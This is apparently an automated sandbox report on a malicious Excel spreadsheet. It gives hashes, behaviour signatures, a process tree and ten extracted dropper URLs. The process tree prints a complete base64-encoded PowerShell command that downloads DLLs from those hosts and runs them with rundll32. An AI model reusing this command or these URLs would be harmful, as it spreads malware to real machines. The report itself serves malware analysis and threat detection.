Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    61s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    20/11/2024, 22:20

General

  • Target

    ac3eb0fc4f8e3552acbbb90c3f9d1e3b920a3a157b9f2c121f4e33e2b6fd6bb6.xls

  • Size

    144KB

  • MD5

    4e5ddc43df4e2df4755a36d76c268c68

  • SHA1

    e6f524a955a7ba956b5d60bc70332b4955bfb89a

  • SHA256

    ac3eb0fc4f8e3552acbbb90c3f9d1e3b920a3a157b9f2c121f4e33e2b6fd6bb6

  • SHA512

    9a7cc46c2f7cf2193c7d7c6b6eb7cb9fc7a22ba380128cefc444fb3aed7b60edce2d47029ac1845680699d7daa43b2d7397fe8701d2b4b83c038d3fba16fb477

  • SSDEEP

    3072:L7cKoSsxzNDZLDZjlbR868O8K0c03D38TehYTdeHVhjqabWHLtyeGx6Z84TI7Gxl:HcKoSsxzNDZLDZjlbR868O8K0c03D38l

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://four.renovatiog.ltd/wp-includes/KGzoB0zsRKZjjEe/

exe.dropper

http://adultfriendfinder-adultfriends.com/mmfdoublepenetrationadultfriends/0pcEeJPfwMU/

exe.dropper

http://jwellery.fameitc.com/wp-includes/wQK7z9cEcwWCUG/

exe.dropper

http://arcgakuin-dev2.sukoburu-secure.com/l35uhr/R1evmjjhga/

exe.dropper

http://bimesarayenovin.ir/wp-admin/z464/

exe.dropper

http://hostfeeling.com/wp-admin/DidtoZk2EEc7BWXyhh/

exe.dropper

http://gardeningfilm.com/wp-content/Ef/

exe.dropper

http://moneymagnetentertainment.com/pz66t8y/Bd0sR0htA8mHibNJrk/

exe.dropper

https://100lamp.com.ua:443/sale/a/

exe.dropper

http://queenofluv.com/uemsub/peLSdHCvfhkge/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\ac3eb0fc4f8e3552acbbb90c3f9d1e3b920a3a157b9f2c121f4e33e2b6fd6bb6.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2296
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\programdata\uylcsekn.bat" "
      2⤵
      • Process spawned unexpected child process
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2804
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -enc JAByAG8AdwBpAGYAaQB1AGQAPQAiAGgAdAB0AHAAOgAvAC8AZgBvAHUAcgAuAHIAZQBuAG8AdgBhAHQAaQBvAGcALgBsAHQAZAAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEsARwB6AG8AQgAwAHoAcwBSAEsAWgBqAGoARQBlAC8ALABoAHQAdABwADoALwAvAGEAZAB1AGwAdABmAHIAaQBlAG4AZABmAGkAbgBkAGUAcgAtAGEAZAB1AGwAdABmAHIAaQBlAG4AZABzAC4AYwBvAG0ALwBtAG0AZgBkAG8AdQBiAGwAZQBwAGUAbgBlAHQAcgBhAHQAaQBvAG4AYQBkAHUAbAB0AGYAcgBpAGUAbgBkAHMALwAwAHAAYwBFAGUASgBQAGYAdwBNAFUALwAsAGgAdAB0AHAAOgAvAC8AagB3AGUAbABsAGUAcgB5AC4AZgBhAG0AZQBpAHQAYwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AdwBRAEsANwB6ADkAYwBFAGMAdwBXAEMAVQBHAC8ALABoAHQAdABwADoALwAvAGEAcgBjAGcAYQBrAHUAaQBuAC0AZABlAHYAMgAuAHMAdQBrAG8AYgB1AHIAdQAtAHMAZQBjAHUAcgBlAC4AYwBvAG0ALwBsADMANQB1AGgAcgAvAFIAMQBlAHYAbQBqAGoAaABnAGEALwAsAGgAdAB0AHAAOgAvAC8AYgBpAG0AZQBzAGEAcgBhAHkAZQBuAG8AdgBpAG4ALgBpAHIALwB3AHAALQBhAGQAbQBpAG4ALwB6ADQANgA0AC8ALABoAHQAdABwADoALwAvAGgAbwBzAHQAZgBlAGUAbABpAG4AZwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8ARABpAGQAdABvAFoAawAyAEUARQBjADcAQgBXAFgAeQBoAGgALwAsAGgAdAB0AHAAOgAvAC8AZwBhAHIAZABlAG4AaQBuAGcAZgBpAGwAbQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAEUAZgAvACwAaAB0AHQAcAA6AC8ALwBtAG8AbgBlAHkAbQBhAGcAbgBlAHQAZQBuAHQAZQByAHQAYQBpAG4AbQBlAG4AdAAuAGMAbwBtAC8AcAB6ADYANgB0ADgAeQAvAEIAZAAwAHMAUgAwAGgAdABBADgAbQBIAGkAYgBOAEoAcgBrAC8ALABoAHQAdABwAHMAOgAvAC8AMQAwADAAbABhAG0AcAAuAGMAbwBtAC4AdQBhADoANAA0ADMALwBzAGEAbABlAC8AYQAvACwAaAB0AHQAcAA6AC8ALwBxAHUAZQBlAG4AbwBmAGwAdQB2AC4AYwBvAG0ALwB1AGUAbQBzAHUAYgAvAHAAZQBMAFMAZABIAEMAdgBmAGgAawBnAGUALwAiAC4AUwBwAGwAaQB0ACgAIgAsACIAKQA7AGYAbwByAGUAYQBjAGgAKAAkAHMAdAAgAGkAbgAgACQAcgBvAHcAaQBmAGkAdQBkACkAewAkAHIAcgB5AGkAdQBkAD0ARwBlAHQALQBSAGEAbgBkAG8AbQA7ACQAZgBnAGgAaQB1AHMAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAIAAkAEcAcwByAEYASgBZAGoAZAA1ADQANgBkAHMAPQAiAGMAOgBcAHAAcgBvAGcAcgBhAG0AZABhAHQAYQBcACIAKwAkAHIAcgB5AGkAdQBkACsAIgAuAGQAbABsACIAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABzAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAEcAcwByAEYASgBZAGoAZAA1ADQANgBkAHMAOwBpAGYAKABUAGUAcwB0AC0AUABhAHQAaAAgACQARwBzAHIARgBKAFkAagBkADUANAA2AGQAcwApAHsAaQBmACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAEcAcwByAEYASgBZAGoAZAA1ADQANgBkAHMAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAA1ADAAMAAwADAAKQB7ACQAZwBoAEQARABGAEoASABrADUAZgA9ACIAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHMAeQBzAHcAbwB3ADYANABcAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACIAOwAkAHQAeQBpAGQAdQBpAHMAZABmAGYAPQAkAEcAcwByAEYASgBZAGoAZAA1ADQANgBkAHMAKwAiACwAZgAiACsAJABmAGcAaABpAHUAcwA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGcAaABEAEQARgBKAEgAawA1AGYAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJAB0AHkAaQBkAHUAaQBzAGQAZgBmADsAYgByAGUAYQBrADsAfQB9AH0A
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2704

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\uylcsekn.bat

    Filesize

    3KB

    MD5

    b3e87e4fda09592bebf3522c319e8b79

    SHA1

    dc061034bbcc3a397e046b5e512ed0235a397fac

    SHA256

    d47ce3fd5ecb89f6a9ab9c71b1541f27236da06a39732efdee85cbaf093a8246

    SHA512

    9b1576eea10d6d70fc8e33bf3df994ae0d02ae6c963c6baa270f095ced7240aae85501a92c9e7f0f6b25d65f356deff4aa644d6073d39d455d15d864e12e7477

  • memory/2296-11-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-27-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-8-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-7-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-10-0x0000000006950000-0x0000000006A50000-memory.dmp

    Filesize

    1024KB

  • memory/2296-9-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-6-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-4-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-5-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-1-0x00000000728CD000-0x00000000728D8000-memory.dmp

    Filesize

    44KB

  • memory/2296-12-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-25-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-13-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-24-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-23-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-21-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2296-26-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-3-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-30-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-29-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-37-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-36-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-39-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-35-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-34-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-32-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-31-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-28-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-22-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-20-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-19-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-18-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-17-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-16-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-15-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-14-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB

  • memory/2296-50-0x00000000728CD000-0x00000000728D8000-memory.dmp

    Filesize

    44KB

  • memory/2296-51-0x00000000007D0000-0x00000000008D0000-memory.dmp

    Filesize

    1024KB